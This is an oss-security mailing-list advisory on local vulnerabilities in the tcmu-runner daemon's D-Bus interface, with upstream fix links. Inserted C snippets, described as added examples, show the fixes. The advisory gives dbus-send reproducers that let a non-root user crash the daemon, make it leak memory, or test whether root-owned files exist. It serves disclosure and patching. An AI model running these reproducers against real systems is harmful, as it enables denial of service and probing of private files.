
List:       oss-security
Subject:    [oss-security] tcmu-runner: multiple vulnerabilities in tcmu-runner daemon allowing local DoS, infor
From:       Matthias Gerstner <mgerstner () suse ! de>
Date:       2017-07-24 10:12:04
Message-ID: 20170724101204.GA22772 () f195 ! suse ! de


A security audit of tcmu-runner's D-Bus service implementation showed a
number of security issues.

I've requested CVEs for these issues, request is still pending. I will
update once I've got them.

It seems upstream will remove the D-Bus interface completely from the
tcmu-runner daemon in the future.

Package: https://github.com/open-iscsi/tcmu-runner

------------------------------------------------------------------------
glfs handler allows local DoS via crafted CheckConfig strings
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
CheckConfig method implemented in the tcmu-runner daemon via
handler_glfs.so and cause various kinds of segmentation faults,
depending on the string passed to the method.

For example, the "hosts" variable in glfs_check_config() is not
zero-initialized but is always freed on the error path, causing an
invalid free and/or invalid memory accesses.
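The cleanup pattern behind this crash, shown as an added example that is not tcmu-runner's own code: a parse function with several allocation steps and a single error label. The function name parse_glfs_config(), the "hosts@volume/path" config layout and the struct are assumptions made for the illustration; the point is that every pointer the error path frees starts out as NULL, so a "goto err" before the first allocation frees nothing instead of a garbage pointer.

```c
/* Added example, not tcmu-runner's code. parse_glfs_config() and the
 * "hosts@volume/path" layout are assumptions for this illustration. */
#include <stdlib.h>
#include <string.h>

struct glfs_cfg {
    char *hosts;
    char *volume;
    char *path;
};

/* Copy len bytes of s into a fresh NUL-terminated string. */
static char *dup_range(const char *s, size_t len)
{
    char *out = malloc(len + 1);
    if (!out)
        return NULL;
    memcpy(out, s, len);
    out[len] = '\0';
    return out;
}

/* Returns 0 and fills cfg on success, -1 on malformed input or OOM.
 * On failure cfg is left untouched and nothing is leaked. */
int parse_glfs_config(const char *config, struct glfs_cfg *cfg)
{
    /* The original left "hosts" uninitialised here; a "goto err" before
     * the first allocation then passed a garbage pointer to free(). */
    char *hosts = NULL;
    char *volume = NULL;
    char *path = NULL;
    const char *at, *slash;

    if (!config || !cfg)
        return -1;

    at = strchr(config, '@');
    if (!at || at == config)
        goto err;                     /* missing or empty host list */
    hosts = dup_range(config, (size_t)(at - config));
    if (!hosts)
        goto err;

    slash = strchr(at + 1, '/');
    if (!slash || slash == at + 1)
        goto err;                     /* missing or empty volume name */
    volume = dup_range(at + 1, (size_t)(slash - (at + 1)));
    if (!volume)
        goto err;

    if (slash[1] == '\0')
        goto err;                     /* empty path inside the volume */
    path = dup_range(slash + 1, strlen(slash + 1));
    if (!path)
        goto err;

    cfg->hosts = hosts;
    cfg->volume = volume;
    cfg->path = path;
    return 0;

err:
    /* free(NULL) is a no-op, so this is safe from every goto above. */
    free(hosts);
    free(volume);
    free(path);
    return -1;
}

void free_glfs_config(struct glfs_cfg *cfg)
{
    free(cfg->hosts);
    free(cfg->volume);
    free(cfg->path);
    memset(cfg, 0, sizeof *cfg);
}
```

Feeding the reproducer's "something" (no '@' at all) takes the very first goto, which is exactly the path that freed an uninitialised pointer in the original; with the NULL initialisation it simply returns -1.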

References:

- The check_config callback implementation was recently removed upstream
  in this commit:

  https://github.com/open-iscsi/tcmu-runner/commit/61bd03e600d2abf309173e9186f4d465bb1b7157

- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049485

Reproducer:

# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 \
    /org/kernel/TCMUService1/glfs \
    org.kernel.TCMUService1.CheckConfig string:something
# -> tcmu-runner daemon will have crashed with segmentation fault

------------------------------------------------------------------------
UnregisterHandler D-Bus method in tcmu-runner daemon for non-existing
handler causes DoS
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
UnregisterHandler method implemented in the tcmu-runner daemon with the
name of an unknown tcmu runner handler as parameter and cause a NULL
pointer dereference.

References:

- upstream fix: https://github.com/open-iscsi/tcmu-runner/commit/e2d953050766ac538615a811c64b34358614edce
                
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049488

Reproducer:

# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 \
    /org/kernel/TCMUService1/HandlerManager1 \
    org.kernel.TCMUService1.HandlerManager1.UnregisterHandler string:fake_handler
# -> tcmu-runner daemon will have crashed with segmentation fault



------------------------------------------------------------------------
UnregisterHandler D-Bus method in tcmu-runner daemon for internal
handler causes DoS
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
UnregisterHandler method implemented in the tcmu-runner daemon with the
name of a handler loaded internally in tcmu-runner via dlopen() and
cause a NULL pointer dereference resulting in DoS.

References:

- upstream fix: https://github.com/open-iscsi/tcmu-runner/commit/bb80e9c7a798f035768260ebdadffb6eb0786178
                
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049489

Reproducer:

# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user, it will attempt to unregister the
# locally loaded qcow handler
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 \
    /org/kernel/TCMUService1/HandlerManager1 \
    org.kernel.TCMUService1.HandlerManager1.UnregisterHandler string:qcow
# -> tcmu-runner daemon will have crashed with segmentation fault


------------------------------------------------------------------------
Memory leaks can be triggered in tcmu-runner daemon by calling D-Bus
method for (Un)RegisterHandler
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
RegisterHandler or UnregisterHandler methods implemented in the
tcmu-runner daemon to trigger memory leaks. Done repeatedly, this would
cause a root daemon to hog memory, possibly resulting in DoS for the
daemon itself or for other system components that fail to acquire memory
as a result.
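The three UnregisterHandler/RegisterHandler issues above (unknown name, daemon-internal handler, leak on repeated calls) come down to three checks in the registry code. As an added example, not tcmu-runner's own code, here is a minimal handler registry that performs them; the list layout, the error codes and the "internal" flag marking handlers the daemon loaded itself via dlopen() are assumptions made for the illustration.

```c
/* Added example, not tcmu-runner's code. Registry layout, error codes
 * and the "internal" flag are assumptions for this illustration. */
#include <stdlib.h>
#include <string.h>

enum {
    HANDLER_OK = 0,
    HANDLER_ENOENT = -1,   /* no handler of that name */
    HANDLER_EPERM = -2,    /* daemon-internal handler, not a D-Bus client's */
    HANDLER_EEXIST = -3,   /* name already registered */
    HANDLER_EINVAL = -4,   /* bad arguments */
    HANDLER_ENOMEM = -5
};

struct handler {
    char *name;
    char *description;
    int internal;          /* 1 if the daemon loaded it via dlopen() */
    struct handler *next;
};

static struct handler *handlers;   /* head of a singly linked list */

static char *dup_str(const char *s)
{
    size_t n = strlen(s) + 1;
    char *p = malloc(n);
    if (p)
        memcpy(p, s, n);
    return p;
}

static void free_handler(struct handler *h)
{
    free(h->name);
    free(h->description);
    free(h);
}

/* Return the link pointing at the handler called name, or NULL. */
static struct handler **find_handler_link(const char *name)
{
    struct handler **pp;
    for (pp = &handlers; *pp; pp = &(*pp)->next)
        if (strcmp((*pp)->name, name) == 0)
            return pp;
    return NULL;
}

/* The duplicate check runs before any allocation and every allocation is
 * released on the failure path, so repeated calls cannot grow the heap. */
int register_handler(const char *name, const char *description, int internal)
{
    struct handler *h;

    if (!name || !*name || !description)
        return HANDLER_EINVAL;
    if (find_handler_link(name))
        return HANDLER_EEXIST;
    h = calloc(1, sizeof *h);
    if (!h)
        return HANDLER_ENOMEM;
    h->name = dup_str(name);
    h->description = dup_str(description);
    if (!h->name || !h->description) {
        free_handler(h);
        return HANDLER_ENOMEM;
    }
    h->internal = internal;
    h->next = handlers;
    handlers = h;
    return HANDLER_OK;
}

/* An unknown name is an error, not a NULL dereference, and handlers the
 * daemon loaded itself are refused because no D-Bus client owns them. */
int unregister_handler(const char *name)
{
    struct handler **pp, *h;

    if (!name)
        return HANDLER_EINVAL;
    pp = find_handler_link(name);
    if (!pp)
        return HANDLER_ENOENT;
    h = *pp;
    if (h->internal)
        return HANDLER_EPERM;
    *pp = h->next;
    free_handler(h);       /* release everything the registration allocated */
    return HANDLER_OK;
}

size_t handler_count(void)
{
    size_t n = 0;
    for (struct handler *h = handlers; h; h = h->next)
        n++;
    return n;
}
```

The reproducers' inputs map directly onto the return codes: "fake_handler" yields HANDLER_ENOENT, the built-in "qcow" yields HANDLER_EPERM, and registering "0memory" twice yields HANDLER_EEXIST without allocating anything the second time. In a D-Bus method handler these codes would be turned into a D-Bus error reply to the caller.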

References:

- upstream fix: https://github.com/open-iscsi/tcmu-runner/commit/7a78eda52d973d3edc06fea84ad874678d6055f0
                
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049490

Reproducer:

# *stop* the tcmu-runner service as root
systemctl stop tcmu-runner.service
# run the tcmu-runner service as root in valgrind
valgrind --max-stackframe=2097208 --leak-check=full /usr/bin/tcmu-runner
# run this dbus command multiple times as a regular user (this will trigger
# the leak in RegisterHandler)
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 \
    /org/kernel/TCMUService1/HandlerManager1 \
    org.kernel.TCMUService1.HandlerManager1.RegisterHandler string:0memory string:stuff
# ctrl-c the valgrind process and you'll see an amount of "definitely lost"
# bytes. When doing the same without the dbus-send calls this should be zero
# "definitely lost" bytes.



------------------------------------------------------------------------
qcow handler opens up an information leak via the CheckConfig D-Bus
method
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
CheckConfig method implemented in the tcmu-runner daemon via
handler_qcow.so and exploit an information leak by passing in arbitrary
filenames to check.

This allows a local user to check for the existence of root owned files,
which might enable more serious security issues in combination with
other security flaws in a system.

References:

- upstream fix:

  This one is difficult to fix, upstream asked me to remove all
  check_config callbacks instead:

  https://github.com/open-iscsi/tcmu-runner/commit/8cf8208775022301adaa59c240bb7f93742d1329

- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049491

Reproducer:

# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 \
    /org/kernel/TCMUService1/qcow \
    org.kernel.TCMUService1.CheckConfig string://root/.bash_history
# this will return True if /root/.bash_history exists, False otherwise

Regards

Matthias

-- 
Matthias Gerstner <matthias.gerstner@suse.de>
Dipl.-Wirtsch.-Inf. (FH), Security Engineer
https://www.suse.com/security
Telefon: +49 911 740 53 290

SUSE Linux GmbH 
GF: Felix Imendörffer, Jane Smithard, Graham Norton
HRB 21284 (AG Nuernberg)


